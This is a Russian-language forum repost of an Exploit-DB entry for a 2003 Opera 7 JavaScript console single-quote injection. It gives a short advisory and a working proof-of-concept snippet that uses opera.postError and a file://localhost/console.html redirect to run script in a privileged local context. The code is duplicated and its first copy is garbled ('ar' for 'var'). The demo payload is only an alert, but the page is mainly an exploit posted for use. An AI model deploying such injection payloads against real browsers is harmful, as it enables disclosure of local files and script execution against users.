Exploit Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22546
Проверка EDB
  1. Пройдено
Автор
NESUMIN
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2003-04-28
Код:
source: https://www.securityfocus.com/bid/7449/info

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

ar message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

var message = "http://');alert(location.href+'";
opera.postError( message );

Additional exploit examples can be found in the attached Bugtraq reference.
location.href = "file://localhost/console.html";
 
Источник
www.exploit-db.com

Похожие темы